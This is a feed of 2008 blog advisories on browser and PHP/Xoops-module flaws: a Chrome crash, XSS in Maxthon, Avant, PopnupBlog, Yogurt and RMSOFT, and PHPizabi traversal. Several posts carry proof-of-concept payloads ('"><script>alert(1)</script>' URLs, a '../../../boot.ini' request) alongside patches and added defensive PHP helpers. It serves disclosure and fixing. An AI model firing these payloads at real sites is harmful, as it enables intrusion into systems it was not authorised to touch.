/>Web-Blog: http://lostmon.blogspot.com/<br />Google group: http://groups.google.com/group/lostmon (new)<br />--<br />Curiosity is what moves the mind....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Curiosity is what moves the mind....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-87475244956585107542008-09-20T04:45:00.004-07:002008-10-18T02:08:17.929-07:00Google Chrome Fatal Crash##########################<br />Google Chrome Fatal Crash<br />##########################<br /><br />Product Version : 0.2.149.30 (2200) and 0.2.149.29<br />URLs (if applicable) : it does not matter.<br />Other browsers tested:<br /><br /> Safari 3: ok<br /> Firefox 3: ok<br /> IE 7: ok<br />With the other browsers I can only saturate the browser.<br /><br />What steps will reproduce the problem?<br />1. open a malformed web page<br />2. close the tab window<br />3. close the same tab window again<br /><br />What is the expected result?<br /><br />The expected result is that Chrome closes the tab and we cannot close the tab again.<br /> <br />What happens instead?<br /><br />Chrome suffers a fatal crash :)<br /><br />Error signature:<br /><br />AppName: chrome.exe AppVer: 0.0.0.0 ModName: chrome.dll<br />ModVer: 0.2.149.30 Offset: 00007b1c<br /><br /><a href="http://usuarios.lycos.es/reyfuss/xss/images/Chrome.GIF" target="_blank"><center><img src="http://usuarios.lycos.es/reyfuss/xss/images/Chrome.GIF" height="250" width="400"></center></a><br /><br />After several tests I can reproduce it every time. The source file and the function involved in the crash:<br /><br /> tab_strip_model.cc<br /><br />http://src.chromium.org/viewvc/chrome/trunk/src/chrome/browser/tabs/tab_strip_model.cc?view=markup&pathrev=83<br /><br />and the affected function in that file is at line 561:<br /><br />TabContents* TabStripModel::GetContentsAt(int index) const {<br />  CHECK(ContainsIndex(index)) <<<br />      "Failed to find: " << index << " in: " << count() << " entries.";<br />  return contents_data_.at(index)->contents;<br />}<br /><br />Reported here:<br />http://code.google.com/p/chromium/issues/detail?id=2579<br /><br />--<br />Thnx to estrella to be my light<br />Thnx To FalconDeOro for his support<br />Thnx To Imydes From http://www.imydes.com<br /><br />-- <br />Regards:<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br />Google group: http://groups.google.com/group/lostmon (new)<br />--<br />Curiosity is what moves the mind.... <br /><br />Thnx for your time !!!<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Curiosity is what moves the mind....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-13223583080351448022008-09-05T14:10:00.002-08:002008-09-05T14:15:20.991-07:00Maxthon Browser URI about: Dialog XSS##########################################<br />Maxthon Browser URI about: Dialog XSS.<br />Vendor URL: http://www.maxthon.com/<br />Advisory: http://lostmon.blogspot.com/2008/09/<br />avant-browser-uri-about-dialog-xss_05.html<br />Vendor notify: yes  exploit available: yes<br />##########################################<br /><br />##########################<br />Vulnerability description<br />##########################<br /><br />Maxthon Browser contains a flaw that allows a remote cross-site scripting attack. This flaw exists because the application does not validate input in the 'about:' URI dialog. This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to loss of integrity.<br /><br />#################<br />Versions<br />################<br /><br />Maxthon Browser 1.6.4 build 20: Vulnerable<br /><br />Maxthon Browser 2.0.2.2961: Not vulnerable<br /><br />Apparently, according to the changelog of this version (2.0.2.2961), the vendor has changed some parts of the about dialog, so this vulnerability is patched from this version on; but prior versions may be vulnerable too.<br /><br /><br />ChangeLog from Maxthon:<br />http://www.maxthon.com/changelog.htm<br /><br /><br /><br />###################<br />Solution<br />###################<br /><br />Update to version 2.0.2.2961 or the latest build.<br /><br /><br /><br />###################<br />Timeline<br />##################<br /><br />Discovered: 16-08-2008<br />Vendor notify: 05-09-2008<br />Vendor response: ---<br />Public Disclosure: ----<br /><br />###################<br />Proof of Concept.<br />###################<br /><br />#############<br />Test<br />#############<br /><br />Put this in your Maxthon Browser:<br /><br />about:"><script>alert(1)</script><br /><br />or create a link like<br /><br /><a href='about:"><script>alert(1)</script>'>Maxthon Browser XSS</a><br /><br />############## €nd ###################<br /><br />Thnx To estrella to be my light<br />Thnx to all Lostmon Team !<br />thnx to imydes From www.imydes.com<br />-- <br />Regards:<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br />Google group: http://groups.google.com/group/lostmon (new)<br />--<br />Curiosity is what moves the mind....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Curiosity is what moves the mind....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-35793259191015511322008-09-05T14:05:00.001-07:002008-09-05T14:09:58.190-07:00Avant Browser URI about: Dialog XSS##########################################<br />Avant Browser URI about: Dialog XSS.<br />Vendor URL: http://www.avantbrowser.com/<br />Advisory: http://lostmon.blogspot.com/2008/09/<br />avant-browser-uri-about-dialog-xss.html<br />Vendor notify: Yes  exploit available: yes<br />##########################################<br /><br />##########################<br />Vulnerability description<br />##########################<br /><br />Avant Browser contains a flaw that allows a remote cross-site scripting attack. This flaw exists because the application does not validate input in the 'about:' URI dialog. This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to loss of integrity.<br /><br />#################<br />Versions<br />################<br /><br />Avant Browser 11.6 build 20: vulnerable.<br /><br />Avant Browser 11.6 build 7: vulnerable<br /><br /><br />###################<br />Solution<br />###################<br /><br />No solution at this time !!!<br /><br /><br /><br />###################<br />Timeline<br />##################<br /><br />Discovered: 16-08-2008<br />Vendor notify: 05-09-2008<br />Vendor response: ---<br />Public Disclosure: ----<br /><br />###################<br />Proof of Concept.<br />###################<br /><br />#############<br />Test<br />#############<br /><br />Put this in your Avant Browser:<br /><br />about:"><script>alert(1)</script><br /><br />or create a link like<br /><br /><a href='about:"><script>alert(1)</script>'>Avant Browser XSS</a><br /><br />############## €nd ###################<br /><br />Thnx To estrella to be my light<br />Thnx to all Lostmon Team !<br />thnx to imydes From www.imydes.com<br />--<br />Regards:<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br />Google group: http://groups.google.com/group/lostmon (new)<br />--<br />Curiosity is what moves the mind....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-14508211404050386292008-08-28T04:33:00.009-07:002008-08-28T07:16:26.229-07:00Multiple browsers Fake files donwload Cross-site scriptingMultiple browsers are afected by a issue wen try to download<br />a fake file, this is a simple study of this situation , and <br />how to take profit. All Browsers have a little system for <br />download files, wen we click in a link,and this link go to<br />a downloable file, the browsers show a dialog to open ,save,<br />or cancel the download.<br /><br />Create a fake files with the follows extensions ,exe,com,jar,<br />bat,pdf,zip,rar,jpg,jpeg,gif,avi,wmv,wma,mpeg, and txt for <br />example...and inside write a javascript code like <br />"><script>alert(1)</script> and in the pdf file ,<br />write before script, the head for a pdf file %PDF- save al <br />files and create a html with links to fake files,for download it.<br /><br />Wen we click in some of this links, some browsers fails<br />to determine what file type it´s and wen the file is open,<br />the script is executed. 
I have test it in tree posible <br />scenarios or i test the security browsers in tree Zones,<br />with multiple browsers , but the most important are in<br />the table.<br /><center><a href="http://usuarios.lycos.es/reyfuss/browsers/tabla.jpg" target="_blank"><img src="http://usuarios.lycos.es/reyfuss/browsers/tabla.jpg" height="250" width="400"></a></center><br /><b> Click In the image to enlarge</B><br />The first test is local file (LF) this is wen we use protocol<br />file:// (ej: file://c:/test/index.html) and the script is runing<br />with the same rights that the users logged.<br /><br />The second test is in a intranet server (ID) it´s wen we visit<br />a page inside our intranet, and The script it´s running in the<br />context of security of intranet zone.<br /><br />The third test is in a internet server (RD) it´s when we visit<br />a page outside our intranet, and The script it´s running in the<br />context of security ofinternet zone .<br /><br />Affter test all, the most efective or secure browsers are ,<br />Mozilla Firefox and Flock browser, because they are non <br />afeccted by this issue in any zone, and the most insecure <br />is Avant browser and Maxthon Browser, because they are <br />vulnerables in the tree zones, this two browsers use explorer<br />modules, but explorer its vulnerable only in two zones.<br /><br />This issue can use to execute XSS style attacks.<br /><br />A malicious user can upload files to server or add downloads<br />to sites with the link to a fake file and wen a user try to <br />donwload it , if it navigate with a vulnerable browser in the<br />Zone, the script is executed with the rights of the affected Zone. 
<br /><br />An example with a more comprehensive table is available here: <a href="http://usuarios.lycos.es/reyfuss/browsers/" target="_blank"><b>POC</b></a><br /><br />############## €nd ###################<br /><br />Thanks to Estrella for being my light<br />Thanks to all the Lostmon Team!<br />Thanks to imydes from www.imydes.com<br />--<br />Sincerely:<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br />Google group: http://groups.google.com/group/lostmon (new)<br />--<br />Curiosity is what makes the mind move....<br /><br />http://usuarios.lycos.es/reyfuss/browsers/<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
Curiosity is what makes the mind move....</div>Lostmon http://www.blogger.com/profile/12070694315455553235 noreply@blogger.com
tag:blogger.com,1999:blog-9011578.post-1444503922009016559 2008-08-25T13:57:00.002-07:00 2008-08-25T15:43:34.558-07:00
PopnupBlog index.php multiple variables XSS<br />##########################################<br />PopnupBlog index.php multiple variables XSS<br />Vendor url: http://www.bluemooninc.biz/<br />Advisory: http://lostmon.blogspot.com/2008/08/popnupblog-indexphp-multiple-variables.html<br />Vendor notified: no. Exploits available: yes<br />##########################################<br /><br />PopnupBlog contains a flaw that allows a remote cross-site scripting attack. This flaw exists because the application does not validate the 'param', 'cat_id' and 'view' variables upon submission to the 'index.php' script. This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to loss of integrity.<br /><br />##########<br />Versions<br />##########<br /><br />PopnupBlog 3.20, code name: Denali<br /><br />Prior versions can be vulnerable too.<br />It affects the following CMS systems if this module is installed:<br /><br />Xoops<br />e-xoops<br />ImpressCMS<br />Bcoos<br /><br />and others that use Xoops code and this module.<br /><br />############<br />Solution<br />############<br /><br />No solution at this time!<br /><br />But you can edit the source code and fix it as follows.<br /><br />To fix 'param', open index.php; around line 37 we have:<br /><br />[code]<br />$params = PopnupBlogUtils::getDateFromHttpParams();<br />$start = PopnupBlogUtils::getStartFromHttpParams();<br />$view = $BlogCNF['default_view'];<br />$select_uid = isset($_GET['uid']) ? intval($_GET['uid']) : 0;<br />[/code]<br /><br />Add a line that forces 'param' to an integer:<br /><br />[code]<br />$_GET['param'] = intval($_GET['param']);<br />$params = PopnupBlogUtils::getDateFromHttpParams();<br />$start = PopnupBlogUtils::getStartFromHttpParams();<br />$view = $BlogCNF['default_view'];<br />$select_uid = isset($_GET['uid']) ? intval($_GET['uid']) : 0;<br />[/code]<br /><br />To fix 'cat_id' and 'view', open index.php; around line 129 we have:<br /><br />[code]<br />$xoopsTpl->assign('popimg', PopnupBlogUtils::mail_popimg()); // get email<br />$cat_id = 0;<br />if (isset($_GET['cat_id'])) $cat_id = $_GET['cat_id'];<br />if (isset($_POST['cat_id'])) $cat_id = $_POST['cat_id'];<br />$xoopsTpl->assign('popnupblog', PopnupBlogUtils::get_blog_list($start, $cat_id, $select_uid));<br />if (isset($_GET['view'])) $view = $_GET['view'];<br />if (isset($_POST['view'])) $view = $_POST['view'];<br />[/code]<br /><br />Add intval() so that both variables are forced to integers:<br /><br />[code]<br />$xoopsTpl->assign('popimg', PopnupBlogUtils::mail_popimg()); // get email<br />$cat_id = 0;<br />if (isset($_GET['cat_id'])) $cat_id = intval($_GET['cat_id']);<br />if (isset($_POST['cat_id'])) $cat_id = intval($_POST['cat_id']);<br />$xoopsTpl->assign('popnupblog', PopnupBlogUtils::get_blog_list($start, $cat_id, $select_uid));<br />if (isset($_GET['view'])) $view = intval($_GET['view']);<br />if (isset($_POST['view'])) $view = intval($_POST['view']);<br />[/code]<br /><br />###########<br />Examples<br />###########<br /><br />http://localhost/modules/popnupblog/index.php?param=1">[XSS-CODE]&start=0,10&cat_id=&view=1<br /><br />http://localhost/modules/popnupblog/index.php?param=&start=0,10&cat_id=">[XSS-CODE]&view=1<br /><br />http://localhost/modules/popnupblog/index.php?param=&start=0,10&cat_id=&view=1">[XSS-CODE]<br /><br />############## €nd ###################<br /><br />Thanks to Estrella for being my light<br />Thanks to all the Lostmon Team!<br />Thanks to imydes from www.imydes.com<br />--<br />Sincerely:<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br />Google group: http://groups.google.com/group/lostmon (new)<br />--<br />Curiosity is what makes the mind move....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
Curiosity is what makes the mind move....</div>Lostmon http://www.blogger.com/profile/12070694315455553235 noreply@blogger.com
tag:blogger.com,1999:blog-9011578.post-7518533296150917391 2008-08-15T10:00:00.001-07:00 2008-08-15T10:23:12.671-07:00
PHPizabi v0.848b traversal file access<br />##########################################<br />PHPizabi v0.848b traversal file access<br />Vendor url: http://www.phpizabi.net/<br />Advisory: http://lostmon.blogspot.com/2008/08/phpizabi-v0848b-traversal-file-access.html<br />Vendor notified: no. Exploit available: yes<br />##########################################<br /><br />############################<br />Description by vendor page:<br />############################<br /><br />PHPizabi is one of the most powerful social networking platforms on the planet. With literally thousands of websites powered by PHPizabi, including everything from simple friends sites to the most complex networking super sites out there. Easy to install, use, and raising the bar on what it is to provide a reliable, fast social networking package to raise your business to the next level.<br /><br />##########################<br />Vulnerability description<br />##########################<br />PHPizabi contains a flaw that allows remote traversal and arbitrary folder enumeration. This flaw exists because the application does not validate the 'query' variable upon submission to the 'index.php' script when the 'L' parameter is set to 'blogs.search'. This could allow remote users to create a specially crafted URL that uses '../' directory traversal characters to view folder files on the target system with the privileges of the target web service.<br /><br />#################<br />Versions<br />#################<br /><br />PHPizabi v0.848b C1 HFP3<br /><br />###################<br />Solution<br />###################<br /><br />At this moment there is no solution for the traversal vulnerability.<br /><br />To solve the XSS issue in blog search, update this system to SP3:<br /><br />Download SP3:<br />http://online.phpizabi.net/distribution/0848bC1_HFP3.zip<br /><br />###################<br />Timeline<br />###################<br /><br />Discovered: 10-08-2008<br />Vendor notified: 14-08-2008<br />Vendor response:<br />Public disclosure: 15-08-2008<br /><br />###################<br />Proof of Concept<br />###################<br /><br />#############<br />XSS<br />#############<br /><br />If the site does not have the 848 Core HotFix Pack 3 (0848bC1_HFP3.zip) installed, this system has an XSS hole in the 'query' variable upon submission to the index.php script when the 'L' parameter is set to blogs.search:<br /><br />http://localhost/phpizabi/index.php?L=blogs.search&query=[XSS-CODE]boolean=or&sin%5B%5D=title&sin%5B%5D=body&order=natural&direction=asc<br /><br />#####################<br />Traversal file access<br />#####################<br /><br />To exploit this issue the attacker needs an admin account.<br /><br />http://localhost/phpizabi/index.php?L=admin.templates.edittemplate&id=../../../boot.ini<br /><br />We can also 'view' the HTML source code generated by a remote server, like:<br /><br />http://localhost/phpizabi/index.php?L=admin.templates.edittemplate&id=http://[Remote-HOST]/folder/file.php<br /><br />But I don't know if we can do something with this...<br /><br />############## €nd ###################<br /><br />Thanks to Estrella for being my light<br />Thanks to all the Lostmon Team!<br />Thanks to imydes from www.imydes.com<br />--<br />Sincerely:<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br />Google group: http://groups.google.com/group/lostmon (new)<br />--<br />Curiosity is what makes the mind move....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
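One way to close the template-editor traversal on the server side, as an added example that is not PHPizabi's code: resolve_template() (a hypothetical name; TEMPLATE_DIR is an assumed location) accepts the id only when it has the shape of a plain template name and its canonical path stays inside the template directory. Both payload shapes from the proof of concept above, a ../ path and a remote URL, are refused by the first check before any file system access.

```php
<?php
// Added example, not PHPizabi code: resolving the template "id" the admin
// template editor receives to a file without letting it leave the template
// directory. TEMPLATE_DIR and the accepted id shape are assumptions.

const TEMPLATE_DIR = __DIR__ . '/templates';

/**
 * Return the absolute path of the template named by $id, or null when the
 * id is not a plain template name or the resolved path is outside
 * TEMPLATE_DIR. Rejects "../" sequences and URLs before touching the disk.
 */
function resolve_template(string $id): ?string
{
    // Allow-list the identifier shape: dot-separated words of letters,
    // digits, '_' and '-'. No slash, no ':', and ".." cannot match because
    // every dot must be followed by at least one word character.
    if (!preg_match('/^[A-Za-z0-9_-]+(\.[A-Za-z0-9_-]+)*$/', $id)) {
        return null;
    }
    $base = realpath(TEMPLATE_DIR);
    $path = realpath(TEMPLATE_DIR . DIRECTORY_SEPARATOR . $id);
    if ($base === false || $path === false) {
        return null; // directory or template does not exist
    }
    // Defence in depth: even a well-formed id could name a symlink that
    // points elsewhere, so confirm the canonical path is under the base.
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

/**
 * Self-check with the shapes from the proof of concept (constructed
 * inputs): a traversal path and a remote URL must both be refused, while
 * an ordinary template name passes the shape check.
 */
function self_check(): array
{
    $shape = '/^[A-Za-z0-9_-]+(\.[A-Za-z0-9_-]+)*$/';
    return [
        'traversal_refused' => resolve_template('../../../boot.ini') === null,
        'remote_refused'    => resolve_template('http://[Remote-HOST]/folder/file.php') === null,
        'plain_id_allowed'  => preg_match($shape, 'header.html') === 1,
    ];
}
```

The shape check does the real work; realpath() is kept because an allow-listed name can still resolve through a symlink, and a containment test on the canonical path catches that case without depending on how the id was spelled.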
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
Curiosity is what makes the mind move....</div>Lostmon http://www.blogger.com/profile/12070694315455553235 noreply@blogger.com
tag:blogger.com,1999:blog-9011578.post-980888992440034465 2008-08-11T05:25:00.002-07:00 2008-08-11T12:38:41.949-07:00
FIX XSS in RMSOFT Downloads Plus<br /><br />Fixing the XSS issues in RMSOFT Downloads Plus.<br /><br />RMSOFT XSS vulnerability report:<br />http://lostmon.blogspot.com/2008/08/rmsoft-downloads-plus-two-scripts-two.html<br /><br />###################<br />FIX $key variable<br />###################<br /><br />Open modules/rmdp/include/rmdp_functions.php.<br /><br />Around line 314 you find the function rmdp_make_searchnav() with this code:<br /><br />[code]<br />function rmdp_make_searchnav(){<br />    global $xoopsDB, $xoopsTpl, $xoopsModule;<br /><br />    $xoopsTpl->assign('lng_allweb', sprintf(_RMDP_ALL_WEB, $xoopsModule->getVar('name')));<br />    $xoopsTpl->assign('lng_search_button', _RMDP_SEARCH_BUTTON);<br />    $key = isset($_POST['key']) ? $_POST['key'] : (isset($_GET['key']) ? $_GET['key'] : '');<br /><br />    $xoopsTpl->assign('key', $key);<br />[/code]<br /><br />The variable $key is vulnerable in both GET and POST. Now wrap it in the htmlspecialchars() function; change it to this:<br /><br />[code]<br />function rmdp_make_searchnav(){<br />    global $xoopsDB, $xoopsTpl, $xoopsModule;<br /><br />    $xoopsTpl->assign('lng_allweb', sprintf(_RMDP_ALL_WEB, $xoopsModule->getVar('name')));<br />    $xoopsTpl->assign('lng_search_button', _RMDP_SEARCH_BUTTON);<br />    $key = isset($_POST['key']) ? htmlspecialchars($_POST['key']) : (isset($_GET['key']) ? htmlspecialchars($_GET['key']) : '');<br /><br />    $xoopsTpl->assign('key', $key);<br />[/code]<br /><br />Now the variable is clean in the function, but we need to sanitize it again in search.php.<br /><br />Open modules/rmdp/search.php.<br /><br />Around line 37 we find two reads of the $key variable:<br />[code]<br />$rmdp_location = 'search';<br />include('header.php');<br />$key = $_GET['key'];<br />if ($key==''){ $key=$_POST['key']; }<br />$cat = isset($_GET['cat']) ? $_GET['cat'] : (isset($_POST['cat']) ? $_POST['cat'] : 0);<br />[/code]<br /><br />It needs cleaning; use htmlspecialchars() again on both GET and POST. Change it to this:<br /><br />[code]<br />$rmdp_location = 'search';<br />include('header.php');<br />$key = htmlspecialchars($_GET['key']);<br />if ($key==''){ $key=htmlspecialchars($_POST['key']); }<br />$cat = isset($_GET['cat']) ? $_GET['cat'] : (isset($_POST['cat']) ? $_POST['cat'] : 0);<br />[/code]<br /><br />$cat apparently is sanitized, but since it is always a numeric value I think of using intval(), like:<br /><br />[code]<br />$cat = isset($_GET['cat']) ? intval($_GET['cat']) : (isset($_POST['cat']) ? intval($_POST['cat']) : 0);<br />[/code]<br /><br />#############################<br />Fix $id variable in down.php<br />#############################<br /><br />Open modules/down.php; around line 38 you find this line of code:<br /><br />[code]$id = $_GET['id'];[/code]<br /><br />It is always a numerical value, so you can change it to this to sanitize it:<br /><br />[code]$id = intval($_GET['id']);[/code]<br /><br />############## €nd ###################<br /><br />Thanks to Estrella for being my light<br />Thanks to all the Lostmon Team!<br />Thanks to imydes from www.imydes.com<br />--<br />Sincerely:<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br />Google group: http://groups.google.com/group/lostmon (new)<br />--<br />Curiosity is what makes the mind move....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
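The same two fixes, intval() for numeric parameters and htmlspecialchars() for text, written once as reusable helpers. This is an added example that serves both the PopnupBlog patch and the RMSOFT Downloads Plus patch above; it is not code from either module, and the function names are hypothetical. request_html() passes ENT_QUOTES and an explicit charset, which the one-line patches omit: without ENT_QUOTES, PHP versions before 8.1 leave single quotes unescaped, so a value echoed into a single-quoted attribute could still break out.

```php
<?php
// Added example, not code from PopnupBlog or RMSOFT Downloads Plus: the two
// one-line fixes above (intval() for numeric parameters, htmlspecialchars()
// for text shown in a page) as reusable helpers. Function names are
// hypothetical; GET is consulted before POST, as search.php does.

/**
 * Read a request parameter that must be an integer: ids, category numbers,
 * page offsets. Non-numeric input yields $default; for a value such as
 * 1"><script>alert(1)</script> intval() keeps the leading 1 and drops the
 * rest, which is exactly what the patches above rely on.
 */
function request_int(string $name, int $default = 0): int
{
    foreach ([$_GET, $_POST] as $source) {
        if (isset($source[$name]) && is_scalar($source[$name])) {
            return intval($source[$name]);
        }
    }
    return $default;
}

/**
 * Read a free-text request parameter for display inside HTML. ENT_QUOTES
 * escapes single as well as double quotes, so the value is safe inside
 * either attribute quoting style and in element text; ENT_SUBSTITUTE
 * replaces invalid UTF-8 instead of returning an empty string; the charset
 * is explicit rather than the PHP default.
 */
function request_html(string $name, string $default = ''): string
{
    foreach ([$_GET, $_POST] as $source) {
        if (isset($source[$name]) && is_string($source[$name])) {
            return htmlspecialchars($source[$name], ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
        }
    }
    return $default;
}

/**
 * Self-check on constructed inputs shaped like the advisories' payloads:
 * a numeric parameter with a quote-and-script suffix, a text parameter
 * with both quote styles and angle brackets, and a parameter that is absent.
 */
function self_check(): array
{
    $_GET  = [
        'cat_id' => '1"><script>alert(1)</script>',
        'key'    => 'it\'s "quoted" & <tagged>',
    ];
    $_POST = [];
    return [
        'cat_id' => request_int('cat_id'),
        'view'   => request_int('view', 1),
        'key'    => request_html('key'),
    ];
}
```

The split between the two helpers is the point: a parameter that is an identifier never needs escaping, because after intval() there is nothing left to escape, while a parameter that is text must be escaped for the context it is written into, and a template is only one such context.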
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
Curiosity is what makes the mind move....</div>Lostmon http://www.blogger.com/profile/12070694315455553235 noreply@blogger.com
tag:blogger.com,1999:blog-9011578.post-1142827046766188037 2008-08-10T19:55:00.001-07:00 2008-08-10T19:59:07.037-07:00
Yogurt Social Network fans.php uid variable XSS<br />##########################################<br />Yogurt Social Network fans.php uid variable XSS<br />Vendor url: http://sourceforge.net/project/showfiles.php?group_id=204109<br />Advisory: http://lostmon.blogspot.com/2008/08/yogurt-social-network-fansphp-uid.html<br />Vendor notified: no. Exploits available: yes<br />##########################################<br /><br />Yogurt Social Network is a social network PHP/MySQL script module for multiple CMS systems like Xoops, e-xoops, Bcoos and ImpressCMS, and probably all CMS based on Xoops code.<br /><br />Yogurt Social Network contains a flaw that allows a remote cross-site scripting attack. This flaw exists because the application does not validate the 'uid' variable upon submission to multiple scripts in the yogurt module. This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to loss of integrity.<br /><br />##########<br />Versions<br />##########<br /><br />Yogurt Social Network 3.2 rc1<br /><br />It affects the following CMS systems if this module is installed:<br /><br />Xoops<br />e-xoops<br />ImpressCMS<br />Bcoos<br /><br />and others that use Xoops code and this module.<br /><br />############<br />Solution<br />############<br /><br />No solution at this time!<br /><br />###########<br />Examples<br />###########<br /><br />http://localhost/impresscms/htdocs/modules/yogurt/fans.php?uid=1">[XSS-CODE]<br /><br />############## €nd ###################<br /><br />Thanks to Estrella for being my light<br />Thanks to all the Lostmon Team!<br />Thanks to imydes from www.imydes.com<br />--<br />Sincerely:<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br />Google group: http://groups.google.com/group/lostmon (new)<br />--<br />Curiosity is what makes the mind move....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
Curiosity is what makes the mind move....</div>Lostmon http://www.blogger.com/profile/12070694315455553235 noreply@blogger.com
tag:blogger.com,1999:blog-9011578.post-8567935472787380362 2008-08-09T12:34:00.002-07:00 2008-08-10T19:59:07.038-07:00
RMSOFT Downloads Plus two scripts two variables XSS<br />##########################################<br />RMSOFT Downloads Plus two scripts two variables XSS<br />Vendor url: http://www.xoops-mexico.net/<br />Advisory: http://lostmon.blogspot.com/2008/08/rmsoft-downloads-plus-two-scripts-two.html<br />Vendor notified: no. Exploits available: yes<br />##########################################<br /><br />RMSOFT Downloads Plus is a download PHP/MySQL script module for multiple CMS systems like Xoops, e-xoops, Bcoos and ImpressCMS, and probably all CMS based on Xoops code.<br /><br />RMSOFT Downloads Plus contains a flaw that allows a remote cross-site scripting attack. This flaw exists because the application does not validate the 'key' variable upon submission to the search.php script, nor the 'id' variable upon submission to the down.php script in the module. This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to loss of integrity.<br /><br />##########<br />Versions<br />##########<br /><br />RMSOFT Downloads Plus 1.5<br />RMSOFT Downloads Plus 1.7<br /><br />It affects the following CMS systems if this module is installed:<br /><br />Xoops<br />e-xoops<br />ImpressCMS<br />Bcoos<br /><br />and others that use Xoops code and this module.<br /><br />############<br />Solution<br />############<br /><br />No solution at this time!<br /><br />###########<br />Examples<br />###########<br /><br />http://localhost/modules/rmdp/search.php?key=">[XSS-code]&cat=0<br /><br />http://localhost/modules/rmdp/down.php?id=1">[XSS-code]<br /><br />http://localhost/modules/rmdp/down.php?com_mode=nest&com_order=1&id=1">[XSS-code]&cid=3#users<br /><br />############## €nd ###################<br /><br />Thanks to Estrella for being my light<br />Thanks to all the Lostmon Team!<br />Thanks to imydes from www.imydes.com<br />--<br />Sincerely:<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br />Google group: http://groups.google.com/group/lostmon (new)<br />--<br />Curiosity is what makes the mind move....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
Curiosity is what makes the mind move....</div>Lostmon http://www.blogger.com/profile/12070694315455553235 noreply@blogger.com
tag:blogger.com,1999:blog-9011578.post-2470936728593754889 2008-08-09T11:20:00.001-07:00 2008-08-10T19:59:07.039-07:00
Yogurt Social Network multiple scripts uid variable XSS<br />##########################################<br />Yogurt Social Network multiple scripts uid variable XSS<br />Vendor url: http://sourceforge.net/project/showfiles.php?group_id=204109<br />Advisory: http://lostmon.blogspot.com/2008/08/yogurt-social-network-multiple-scripts.html<br />Vendor notified: no. Exploits available: yes<br />##########################################<br /><br />Yogurt Social Network is a social network PHP/MySQL script module for multiple CMS systems like Xoops, e-xoops, Bcoos and ImpressCMS, and probably all CMS based on Xoops code.<br /><br />Yogurt Social Network contains a flaw that allows a remote cross-site scripting attack. This flaw exists because the application does not validate the 'uid' variable upon submission to multiple scripts in the yogurt module. This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to loss of integrity.<br /><br />##########<br />Versions<br />##########<br /><br />Yogurt Social Network 3.2 rc1<br /><br />It affects the following CMS systems if this module is installed:<br /><br />Xoops<br />e-xoops<br />ImpressCMS<br />Bcoos<br /><br />and others that use Xoops code and this module.<br /><br />############<br />Solution<br />############<br /><br />No solution at this time!<br /><br />###########<br />Examples<br />###########<br /><br />http://localhost/impresscms/htdocs/modules/yogurt/friends.php?uid=1"><script>alert(1)</script><br /><br />http://localhost/impresscms/htdocs/modules/yogurt/seutubo.php?uid=1"><script>alert(1)</script><br /><br />http://localhost/impresscms/htdocs/modules/yogurt/album.php?uid=1"><script>alert(1)</script><br /><br />http://localhost/impresscms/htdocs/modules/yogurt/scrapbook.php?uid=1"><script>alert(1)</script><br /><br />http://localhost/impresscms/htdocs/modules/yogurt/index.php?uid=1"><script>alert(1)</script><br /><br />http://localhost/impresscms/htdocs/modules/yogurt/tribes.php?uid=1"><script>alert(1)</script><br /><br />Also, an authenticated user can compose a new scrap with XSS code in the description textarea, and it is executed when a user views the attacker's malformed scrap (stored XSS).<br /><br />############## €nd ###################<br /><br />Thanks to Estrella for being my light<br />Thanks to all the Lostmon Team!<br />Thanks to imydes from www.imydes.com<br />--<br />Sincerely:<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br />Google group: http://groups.google.com/group/lostmon (new)<br />--<br />Curiosity is what makes the mind move....<div 